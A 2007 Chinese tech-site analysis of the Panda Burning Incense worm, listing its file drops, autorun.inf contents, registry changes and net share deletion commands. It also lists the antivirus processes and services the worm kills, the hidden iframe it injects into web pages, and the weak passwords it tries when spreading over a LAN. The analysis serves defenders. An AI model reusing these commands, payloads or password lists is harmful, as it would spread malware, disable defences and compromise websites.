正在阅读:熊猫烧香病毒专杀及手动修复方案 v1.1熊猫烧香病毒专杀及手动修复方案 v1.1

2007-01-13 12:25 出处:PConline 作者:GonNa 责任编辑:caihao

  以下是熊猫烧香病毒详细行为和解决办法:

  熊猫烧香病毒详细行为:

  1.复制自身到系统目录下:

  %System%\drivers\spoclsv.exe(“%System%”代表Windows所在目录,比如:C:\Windows)

  不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。

  2.创建启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "svcshare"="%System%\drivers\spoclsv.exe"

  3.在各分区根目录生成病毒副本:
  X:\setup.exe
  X:\autorun.inf

  autorun.inf内容:

  [AutoRun]
  OPEN=setup.exe
  shellexecute=setup.exe
  shell\Auto\command=setup.exe

  4.使用net share命令关闭管理共享:

  cmd.exe /c net share X$ /del /y
  cmd.exe /c net share admin$ /del /y

  5.修改“显示所有文件和文件夹”设置:

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
  \Explorer\Advanced\Folder\Hidden\SHOWALL]
  "CheckedValue"=dword:00000000

  6.熊猫烧香病毒尝试关闭安全软件相关窗口:

  天网
  防火墙
  进程
  VirusScan
  NOD32
  网镖
  杀毒
  毒霸
  瑞星
  江民
  黄山IE
  超级兔子
  优化大师
  木马清道夫
  木馬清道夫
  QQ病毒
  注册表编辑器
  系统配置实用程序
  卡巴斯基反病毒
  Symantec AntiVirus
  Duba
  Windows 任务管理器
  esteem procs
  绿鹰PC
  密码防盗
  噬菌体
  木马辅助查找器
  System Safety Monitor
  Wrapped gift Killer
  Winsock Expert
  游戏木马检测大师
  超级巡警
  msctls_statusbar32
  pjf(ustc)
  IceSword

  7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程:

  Mcshield.exe
  VsTskMgr.exe
  naPrdMgr.exe
  UpdaterUI.exe
  TBMon.exe
  scan32.exe
  Ravmond.exe
  CCenter.exe
  RavTask.exe
  Rav.exe
  Ravmon.exe
  RavmonD.exe
  RavStub.exe
  KVXP.kxp
  KvMonXP.kxp
  KVCenter.kxp
  KVSrvXP.exe
  KRegEx.exe
  UIHost.exe
  TrojDie.kxp
  FrogAgent.exe
  Logo1_.exe
  Logo_1.exe
  Rundl132.exe

  8.禁用安全软件相关服务:

  Schedule
  sharedaccess
  RsCCenter
  RsRavMon
  KVWSC
  KVSrvXP
  kavsvc
  AVP
  McAfeeFramework
  McShield
  McTaskManager
  navapsvc
  wscsvc
  KPfwSvc
  SNDSrvc
  ccProxy
  ccEvtMgr
  ccSetMgr
  SPBBCSvc
  Symantec Core LC
  NPFMntor
  MskService
  FireSvc

  9.删除安全软件相关启动项:

  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

  10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:

  <iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

  但不修改以下目录中的网页文件:

  C:\WINDOWS
  C:\WINNT
  C:\system32
  C:\Documents and Settings
  C:\System Volume Information
  C:\Recycled
  Program Files\Windows NT
  Program Files\WindowsUpdate
  Program Files\Windows Media Player
  Program Files\Outlook Express
  Program Files\Internet Explorer
  Program Files\NetMeeting
  Program Files\Common Files
  Program Files\ComPlus Applications
  Program Files\Messenger
  Program Files\InstallShield Installation Information
  Program Files\MSN
  Program Files\Microsoft Frontpage
  Program Files\Movie Maker
  Program Files\MSN Gamin Zone

  11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。

  12.此外,病毒还会尝试删除GHO文件。

  病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
  password
  harley
  golf
  pussy
  mustang
  shadow
  fish
  qwerty
  baseball
  letmein
  ccc
  admin
  abc
  pass
  passwd
  database
  abcd
  abc123
  sybase
  123qwe
  server
  computer
  super
  123asd
  ihavenopass
  godblessyou
  enable
  alpha
  1234qwer
  123abc
  aaa
  patrick
  pat
  administrator
  root
  sex
  god
  fuckyou
  fuck
  test
  test123
  temp
  temp123
  win
  asdf
  pwd
  qwer
  yxcv
  zxcv
  home
  xxx
  owner
  login
  Login
  love
  mypc
  mypc123
  admin123
  mypass
  mypass123
  Administrator
  Guest
  admin
  Root

  病毒文件内含有这些信息:

  whboy
  ***武*汉*男*生*感*染*下*载*者***

键盘也能翻页,试试“← →”键

相关文章

关注我们

最新资讯离线随时看 聊天吐槽赢奖品